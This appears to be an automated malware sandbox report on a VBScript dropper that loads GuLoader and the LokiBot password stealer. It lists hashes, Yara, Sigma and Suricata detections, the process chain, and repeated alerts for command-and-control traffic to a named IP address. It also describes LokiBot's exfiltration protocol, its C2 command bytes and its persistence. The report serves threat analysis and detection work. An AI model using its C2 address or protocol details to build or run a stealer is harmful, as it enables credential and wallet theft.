Windows Analysis Report
Bnnebgers.vbs

Overview

General Information

Sample name: Bnnebgers.vbs
Analysis ID: 1522525
MD5: 5b6ded9dd4c8b33c96ec2dfccc4185ba
SHA1: baf00d33cc29a38cedd43d1b483a24e5af5ef707
SHA256: b39688815505416bd3ce779da8714b4eb492dea27036998ad90ddc439b8d554f
Tags: Loki, vbs, user-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4348 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 416 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name: Loki Password Stealer (PWS), LokiBot
Description:
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe
  • Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.
  • Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.
  • The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.
  • Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.
  • There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:
    FILE EXTENSION - FILE DESCRIPTION
    • .exe - A copy of the malware that will execute every time the user account is logged into
    • .lck - A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
    • .hdb - A database of hashes for data that has already been exfiltrated to the C2 server
    • .kdb - A database of keylogger data that has yet to be sent to the C2 server
  • If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.
  • The first packet transmitted by Loki-Bot contains application data.
  • The second packet transmitted by Loki-Bot contains decrypted Windows credentials.
  • The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.
  • Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.
  • The first WORD of the HTTP Payload represents the Loki-Bot version.
  • The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:
    BYTE - PAYLOAD TYPE
    • 0x26 - Stolen Cryptocurrency Wallet
    • 0x27 - Stolen Application Data
    • 0x28 - Get C2 Commands from C2 Server
    • 0x29 - Stolen File
    • 0x2A - POS (Point of Sale?)
    • 0x2B - Keylogger Data
    • 0x2C - Screenshot
  • The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!
  • Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.
  • The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.
  • Loki-Bot can accept the following instructions from the C2 Server:
    BYTE - INSTRUCTION DESCRIPTION
    • 0x00 - Download EXE & Execute
    • 0x01 - Download DLL & Load #1
    • 0x02 - Download DLL & Load #2
    • 0x08 - Delete HDB File
    • 0x09 - Start Keylogger
    • 0x0A - Mine & Steal Data
    • 0x0E - Exit Loki-Bot
    • 0x0F - Upgrade Loki-Bot
    • 0x10 - Change C2 Polling Frequency
    • 0x11 - Delete Executables & Exit
  • Suricata Signatures
    RULE SID - RULE NAME
    • 2024311 - ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
    • 2024312 - ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
    • 2024313 - ET TROJAN Loki Bot Request for C2 Commands Detected M1
    • 2024314 - ET TROJAN Loki Bot File Exfiltration Detected
    • 2024315 - ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
    • 2024316 - ET TROJAN Loki Bot Screenshot Exfiltration Detected
    • 2024317 - ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
    • 2024318 - ET TROJAN Loki Bot Request for C2 Commands Detected M2
    • 2024319 - ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 6648 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author | Strings
amsi64_6648.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_4348.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                • 0xc6c0:$b2: ::FromBase64String(
                • 0xb748:$s1: -join
                • 0x4ef4:$s4: +=
                • 0x4fb6:$s4: +=
                • 0x91dd:$s4: +=
                • 0xb2fa:$s4: +=
                • 0xb5e4:$s4: +=
                • 0xb72a:$s4: +=
                • 0x15ff4:$s4: +=
                • 0x16074:$s4: +=
                • 0x1613a:$s4: +=
                • 0x161ba:$s4: +=
                • 0x16390:$s4: +=
                • 0x16414:$s4: +=
                • 0xbf60:$e4: Get-WmiObject
                • 0xc14f:$e4: Get-Process
                • 0xc1a7:$e4: Start-Process
                • 0x16cfa:$e4: Get-Process

                System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", ProcessId: 6404, ProcessName: wscript.exe
Source: Network Connection, Author: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", ProcessId: 6404, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T10:03:40.197533+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:43.206738+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 137.184.191.215 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T10:03:37.762735+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:40.295445+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:43.419899+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:46.121629+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:48.902903+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:51.764344+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:54.406913+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 137.184.191.215 | 80 | TCP
2024-09-30T10:03:57.375312+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:00.190479+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:02.933069+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:05.678113+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:08.387339+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:11.081114+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:13.777859+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:16.465295+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:19.199611+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:22.028391+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:24.890573+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:27.779108+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:30.577567+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:33.404478+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:36.560030+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:39.362494+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:42.109431+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:44.921692+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49765 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:47.749966+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49766 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:50.551239+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49767 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:53.321681+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49768 | 137.184.191.215 | 80 | TCP
2024-09-30T10:04:56.119034+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 137.184.191.215 | 80 | TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:45.962176+020020243131Malware Command and Control Activity Detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:48.746381+020020243131Malware Command and Control Activity Detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:51.612879+020020243131Malware Command and Control Activity Detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:54.245787+020020243131Malware Command and Control Activity Detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:57.201550+020020243131Malware Command and Control Activity Detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:04:00.028599+020020243131Malware Command and Control Activity Detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:02.782457+020020243131Malware Command and Control Activity Detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:05.519273+020020243131Malware Command and Control Activity Detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:08.226409+020020243131Malware Command and Control Activity Detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:10.928110+020020243131Malware Command and Control Activity Detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:13.630115+020020243131Malware Command and Control Activity Detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:16.314538+020020243131Malware Command and Control Activity Detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:19.040370+020020243131Malware Command and Control Activity Detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:21.852698+020020243131Malware Command and Control Activity Detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:24.554059+020020243131Malware Command and Control Activity Detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:27.506984+020020243131Malware Command and Control Activity Detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:30.424231+020020243131Malware Command and Control Activity Detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:33.235380+020020243131Malware Command and Control Activity Detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:36.025873+020020243131Malware Command and Control Activity Detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:39.113166+020020243131Malware Command and Control Activity Detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:41.940599+020020243131Malware Command and Control Activity Detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:44.760076+020020243131Malware Command and Control Activity Detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:47.588537+020020243131Malware Command and Control Activity Detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:50.392059+020020243131Malware Command and Control Activity Detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:53.167318+020020243131Malware Command and Control Activity Detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:55.967251+020020243131Malware Command and Control Activity Detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:58.722041+020020243131Malware Command and Control Activity Detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:45.962176+020020243181Malware Command and Control Activity Detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:48.746381+020020243181Malware Command and Control Activity Detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:51.612879+020020243181Malware Command and Control Activity Detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:54.245787+020020243181Malware Command and Control Activity Detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:57.201550+020020243181Malware Command and Control Activity Detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:04:00.028599+020020243181Malware Command and Control Activity Detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:02.782457+020020243181Malware Command and Control Activity Detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:05.519273+020020243181Malware Command and Control Activity Detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:08.226409+020020243181Malware Command and Control Activity Detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:10.928110+020020243181Malware Command and Control Activity Detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:13.630115+020020243181Malware Command and Control Activity Detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:16.314538+020020243181Malware Command and Control Activity Detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:19.040370+020020243181Malware Command and Control Activity Detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:21.852698+020020243181Malware Command and Control Activity Detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:24.554059+020020243181Malware Command and Control Activity Detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:27.506984+020020243181Malware Command and Control Activity Detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:30.424231+020020243181Malware Command and Control Activity Detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:33.235380+020020243181Malware Command and Control Activity Detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:36.025873+020020243181Malware Command and Control Activity Detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:39.113166+020020243181Malware Command and Control Activity Detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:41.940599+020020243181Malware Command and Control Activity Detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:44.760076+020020243181Malware Command and Control Activity Detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:47.588537+020020243181Malware Command and Control Activity Detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:50.392059+020020243181Malware Command and Control Activity Detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:53.167318+020020243181Malware Command and Control Activity Detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:55.967251+020020243181Malware Command and Control Activity Detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:58.722041+020020243181Malware Command and Control Activity Detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:37.762735+020020216411A Network Trojan was detected192.168.2.449740137.184.191.21580TCP
                2024-09-30T10:03:40.295445+020020216411A Network Trojan was detected192.168.2.449741137.184.191.21580TCP
                2024-09-30T10:03:43.419899+020020216411A Network Trojan was detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:46.121629+020020216411A Network Trojan was detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:48.902903+020020216411A Network Trojan was detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:51.764344+020020216411A Network Trojan was detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:54.406913+020020216411A Network Trojan was detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:03:57.375312+020020216411A Network Trojan was detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:00.190479+020020216411A Network Trojan was detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:02.933069+020020216411A Network Trojan was detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:05.678113+020020216411A Network Trojan was detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:08.387339+020020216411A Network Trojan was detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:11.081114+020020216411A Network Trojan was detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:13.777859+020020216411A Network Trojan was detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:16.465295+020020216411A Network Trojan was detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:19.199611+020020216411A Network Trojan was detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:22.028391+020020216411A Network Trojan was detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:24.890573+020020216411A Network Trojan was detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:27.779108+020020216411A Network Trojan was detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:30.577567+020020216411A Network Trojan was detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:33.404478+020020216411A Network Trojan was detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:36.560030+020020216411A Network Trojan was detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:39.362494+020020216411A Network Trojan was detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:42.109431+020020216411A Network Trojan was detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:44.921692+020020216411A Network Trojan was detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:47.749966+020020216411A Network Trojan was detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:50.551239+020020216411A Network Trojan was detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:53.321681+020020216411A Network Trojan was detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:56.119034+020020216411A Network Trojan was detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:32.883154+020028032702Potentially Bad Traffic192.168.2.449738142.250.185.206443TCP

                AV Detection

                Source: http://137.184.191.215/index.php/039, Virustotal: Detection: 13%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
                Source: unknown, HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbIn.1 source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb] source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2681410204.000000000320A000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 137.184.191.215:80
